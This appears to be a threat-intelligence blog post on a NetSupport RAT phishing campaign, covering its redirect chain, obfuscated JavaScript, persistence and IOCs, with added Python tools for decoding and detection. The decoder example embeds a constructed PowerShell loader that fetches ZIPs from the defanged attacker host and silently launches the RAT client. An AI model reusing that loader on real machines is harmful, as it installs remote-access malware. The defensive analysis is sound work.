NetSupport RAT hits again with new IOCs
Summary
A new campaign observed over the past day managed to get past EDR products. It uses phishing emails to distribute the malware, with the links wrapped by Microsoft Safe Links and redirected through several sites that host the malware itself.
How it’s done
The attacker mass-distributes the malware by email and abuses legitimate services to get past email protection systems, targeting companies in the technology sector.
Once the victim receives the email and clicks “View Your Invoice”, they are redirected to a second site that presents a “Download Invoice” button.
Clicking that button sends the victim to “googleuserconetnt.com”, which acts as an open redirect to the site that actually serves the malware.
Examining the downloaded JS file, we found the code obfuscated with a generic JS obfuscator (Obfuscate.io).
After deobfuscating the code enough to read and debug it, the steps the JS performs and the C2 addresses it contacts (the “targetURL”) become visible.
Diving deeper…
When the script runs, it uses “targetURL” to build a command, creates a “WScript.Shell” object, and runs a hidden, encoded PowerShell command through it.
We decoded and cleaned up the PowerShell code hosted at that URL; it reveals additional files being downloaded, where they are stored, and under what names.
The script fetches several ZIP files, each containing multiple files, using “Start-BitsTransfer” to pull them from the C2 server to the victim’s machine.
All of the files were retrieved from the same domain, and browsing to it we found an open directory.
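The decoding step above is where analysts most often trip: PowerShell’s -EncodedCommand argument is base64 over UTF-16LE text, so decoding the blob as UTF-8 yields NUL-interleaved junk. The following Python is an added example (our code, not the authors’ tooling and not the campaign’s script) that round-trips an encoded command and pulls the download URLs, the Start-BitsTransfer source/destination pairs, the %AppData% drop directory and the hidden-window flag out of it. The sample script is constructed: the URLs are this post’s defanged IOCs, while the $d variable, the Expand-Archive and Start-Process lines are assumptions about how such a loader is written.

```python
import base64
import re

# Constructed sample of the loader PowerShell described on the page. URLs are the
# post's defanged IOCs; $d, Expand-Archive and Start-Process are assumptions.
SAMPLE_PS = r'''
$d = "$env:APPDATA\aragdrts"
New-Item -ItemType Directory -Path $d -Force | Out-Null
Start-BitsTransfer -Source "hxxps://core-click[.]net/TVFrontend/NSM.zip" -Destination "$d\NSM.zip"
Start-BitsTransfer -Source "hxxps://core-click[.]net/TVFrontend/remcmdstub.zip" -Destination "$d\remcmdstub.zip"
Expand-Archive -Path "$d\NSM.zip" -DestinationPath $d -Force
Start-Process -FilePath "$d\client32.exe" -WindowStyle Hidden
'''


def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument: PowerShell expects base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Reverse of encode_command. Decoding the bytes as UTF-8 would give NUL-interleaved junk."""
    return base64.b64decode(encoded).decode("utf-16-le")


def refang(ioc: str) -> str:
    """Turn the report-style defanged form back into a real URL/domain (for comparisons only)."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s\"'<>]+", re.I)
DROP_DIR_RE = re.compile(r"\$env:APPDATA\\([A-Za-z0-9_.-]+)", re.I)
HIDDEN_RE = re.compile(r"-(?:w|windowstyle)\s+h(?:idden)?\b", re.I)


def parse_bits_transfers(script: str):
    """Return (source, destination) per Start-BitsTransfer line, in either parameter order."""
    pairs = []
    for line in script.splitlines():
        if not re.search(r"\bStart-BitsTransfer\b", line, re.I):
            continue
        src = re.search(r"-Source\s+[\"']?([^\s\"']+)", line, re.I)
        dst = re.search(r"-Destination\s+[\"']?([^\s\"']+)", line, re.I)
        pairs.append((src.group(1) if src else None, dst.group(1) if dst else None))
    return pairs


def extract_iocs(script: str) -> dict:
    """Network and host indicators worth carrying into a report or a blocklist."""
    urls = sorted({m.group(0).rstrip('",;)') for m in URL_RE.finditer(script)})
    domains = sorted({re.sub(r"^h(?:xx|tt)ps?://", "", u, flags=re.I).split("/")[0] for u in urls})
    return {
        "urls": urls,
        "domains": domains,
        "drop_dirs": sorted(set(DROP_DIR_RE.findall(script))),
        "bits_transfers": parse_bits_transfers(script),
        "hidden_window": bool(HIDDEN_RE.search(script)),
    }


def analyze_encoded(encoded: str) -> dict:
    """Decode an -EncodedCommand blob and extract its indicators in one step."""
    return extract_iocs(decode_command(encoded))


if __name__ == "__main__":
    blob = encode_command(SAMPLE_PS)
    for key, value in analyze_encoded(blob).items():
        print(f"{key}: {value}")
```

The extraction is line-oriented on purpose: real loaders often put each Start-BitsTransfer on its own line, and -Destination sometimes precedes -Source, which a single anchored regex would miss.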
Execution Flow
We took the decoded PowerShell command and ran it from CMD.
The PowerShell creates a directory named “aragdrts” under %AppData% and stores all of the files there.
It then launches “client32.exe”, which sets up persistence and takes its connection configuration from the “client32.ini” file.
In the execution tree, “client32.exe” stays running and holds an active connection to the attacker.
The executable uses several persistence techniques:
Scheduled tasks
Startup Menu file saving
Registry Key
The scheduled task:
Startup Menu file:
Registry Key:
With persistence in place, let’s analyze the attacker’s connection.
Using Process Monitor, we can see the TCP traffic generated by the executable, the IPs used for the session and the remote access, and a dedicated port used only for the session itself.
Analyzing the processes, we can also gather the remaining details of the RAT session:
Computer name:
The name of the RAT itself!:
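To turn the persistence and connection findings above into something a SOC can run, here is an added Python example (our code, not the authors’ or NetSupport’s) that applies the observed behaviours as detection rules over constructed, Sysmon-shaped events. The %AppData%\aragdrts drop path, client32.exe, the wscript-to-hidden-PowerShell chain and the IP come from the page; the user name, Run value name, task name, Startup file name, base64 blob and port number are placeholders, since the post shows these as screenshots without naming them. The rule for the network session flags the port separately, matching the page’s observation of a dedicated non-web port.

```python
import ntpath
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RAT = r"C:\Users\alice\AppData\Roaming\aragdrts\client32.exe"

# Constructed, Sysmon-shaped telemetry: id 1 = process create, 3 = network
# connect, 11 = file create, 13 = registry value set. The drop path and
# binary name follow the page; the user name, Run value name, task name,
# startup file name, base64 blob and port are placeholders.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\IN5632.js"'},
    {"id": 1, "image": PS, "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -w hidden -enc JABkACAAPQAgACIA"},
    {"id": 1, "image": RAT, "parent": PS, "cmdline": "client32.exe"},
    {"id": 13, "image": RAT, "details": RAT,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\aragdrts"},
    {"id": 11, "image": RAT,
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aragdrts.js"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": RAT,
     "cmdline": r'schtasks.exe /create /tn "aragdrts" /sc onlogon /tr "C:\Users\alice\AppData\Roaming\aragdrts\client32.exe"'},
    {"id": 3, "image": RAT, "dest_ip": "74.50.81.180", "dest_port": 5421},
    {"id": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "OUTLOOK.EXE"},
]

USER_WRITABLE = re.compile(r"\\(?:AppData\\(?:Roaming|Local)|Users\\Public|ProgramData)\\", re.I)
STARTUP_FILE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:js|jse|vbs|vbe|wsf|bat|cmd|ps1|lnk)$", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
HIDDEN = re.compile(r"-(?:w|windowstyle)\s+h(?:idden)?\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+\S", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
WEB_PORTS = {80, 443}


def _base(path):
    """Lower-cased file name of a Windows path (ntpath so it also works on Linux)."""
    return ntpath.basename(path or "").lower()


def detect(events):
    """Apply the observed behaviours as rules; returns (event index, rule, technique) per hit."""
    hits = []
    for i, ev in enumerate(events):
        img, cmd, tgt = ev.get("image", ""), ev.get("cmdline", ""), ev.get("target", "")
        # Script host (the IN####.js stage) spawning hidden, encoded PowerShell
        if (ev["id"] == 1 and _base(img) == "powershell.exe"
                and _base(ev.get("parent")) in SCRIPT_HOSTS
                and HIDDEN.search(cmd) and ENCODED.search(cmd)):
            hits.append((i, "script_host_to_hidden_encoded_powershell", "T1564.003"))
        # NetSupport client launched from a user-writable drop directory
        if ev["id"] == 1 and _base(img) == "client32.exe" and USER_WRITABLE.search(img):
            hits.append((i, "netsupport_client_from_user_writable_dir", "T1219"))
        # Run key whose data points into a user-writable directory
        if ev["id"] == 13 and RUN_KEY.search(tgt) and USER_WRITABLE.search(ev.get("details", "")):
            hits.append((i, "run_key_points_to_user_writable_dir", "T1547.001"))
        # Script file dropped into the per-user Startup folder
        if ev["id"] == 11 and STARTUP_FILE.search(tgt):
            hits.append((i, "script_dropped_in_startup_folder", "T1547.001"))
        # Scheduled task created to run a binary from a user-writable directory
        if (ev["id"] == 1 and _base(img) == "schtasks.exe"
                and "/create" in cmd.lower() and USER_WRITABLE.search(cmd)):
            hits.append((i, "scheduled_task_runs_user_writable_binary", "T1053.005"))
        # Outbound session from client32.exe; flag the port too when it is not web traffic
        if ev["id"] == 3 and _base(img) == "client32.exe":
            hits.append((i, "netsupport_client_network_session", "T1219"))
            if ev.get("dest_port") not in WEB_PORTS:
                hits.append((i, "rat_session_on_non_standard_port", "T1571"))
    return hits


def techniques(hits):
    """Distinct ATT&CK IDs seen, for a quick coverage summary."""
    return sorted({t for _, _, t in hits})


if __name__ == "__main__":
    for idx, rule, tech in detect(EVENTS):
        print(f"event {idx}: {rule} [{tech}]")
    print("techniques:", techniques(detect(EVENTS)))
```

Each rule keys on a behaviour rather than on the hash or domain, so it still fires when the attacker rotates the ZIP names or the C2; the benign OUTLOOK.EXE event is there to show the rules stay quiet on ordinary process creation.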
Conclusion
The NetSupport RAT we found was delivered by a phishing email containing a URL that goes through multiple redirects before downloading the JS malware.
The JS was obfuscated and pulled an encoded malicious PowerShell script hosted at a public URL.
The PowerShell command contains the C2 servers and uses BITS transfers to fetch the malicious files from the attacker’s server and execute them.
Once “client32.exe” runs, it uses the other dropped files as the configuration for the NetSupport remote session.
The malware uses multiple persistence techniques to make sure the session survives.
TTPs
Remote Access Software (T1219) — https://attack.mitre.org/techniques/T1219/
Scheduled Task/Job: Scheduled Task (T1053.005) — https://attack.mitre.org/techniques/T1053/005/
Windows Management Instrumentation (T1047) — https://attack.mitre.org/techniques/T1047/
Hide Artifacts: Hidden Files and Directories (T1564.001) — https://attack.mitre.org/techniques/T1564/001/
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) — https://attack.mitre.org/techniques/T1547/001/
Hide Artifacts: Hidden Window (T1564.003) — https://attack.mitre.org/techniques/T1564/003/
Modify Registry (T1112) — https://attack.mitre.org/techniques/T1112/
Obfuscated Files or Information: Software Packing (T1027.002) — https://attack.mitre.org/techniques/T1027/002/
System Network Connections Discovery (T1049) — https://attack.mitre.org/techniques/T1049/
File and Directory Discovery (T1083) — https://attack.mitre.org/techniques/T1083/
Process Discovery (T1057) — https://attack.mitre.org/techniques/T1057/
Query Registry (T1012) — https://attack.mitre.org/techniques/T1012/
Non-Standard Port (T1571) — https://attack.mitre.org/techniques/T1571/
IOCs
URLs:
ps1.dropper: hxxps://hsdiagnostico[.]com/readme.php
exe.dropper: hxxps://core-click[.]net/TVFrontend/NSM.zip
exe.dropper: hxxps://core-click[.]net/TVFrontend/remcmdstub.zip
exe.dropper: hxxps://core-click[.]net/TVFrontend/DLAA1view.zip
exe.dropper: hxxps://core-click[.]net/TVFrontend/mock/
Domains:
helasirasi[.]com [Client32]
geo[.]netsupportsoftware[.]com [Client32] (NetSupport’s own geolocation service, also contacted by legitimate installs; use as supporting context, not as a standalone block indicator)
hsdiagnostico[.]com [PowerShell]
core-click[.]net [tls, http2]
IPs:
74.50.81.180
98.143.147.253
212.113.116.33
104.26.1.231:80
SHA256:
[IN5632.js] 5657AEA8AFD1E0C0BDC4D3ACDBDF4C8C02ABDF4C75D4687083A6F26BAB09610D
[Client32] 42C2D35457ABCE2FEA3897BA5E569F51B74B40302FF15B782E3B20B0AA00B34E
[StartUp Folder JS] 3689DDD7D45EA04F13E073F993AFB1B52D576D455D9317F446A31CC282324213
OpenDir:
hxxps://core-click[.]net/TVFrontend/
hxxps://core-click[.]net/TVFrontend/mock/
Filename pattern (RegEx): IN[0-9]{4}\.js
Credits: Idan Tarab, Ariel Davidpur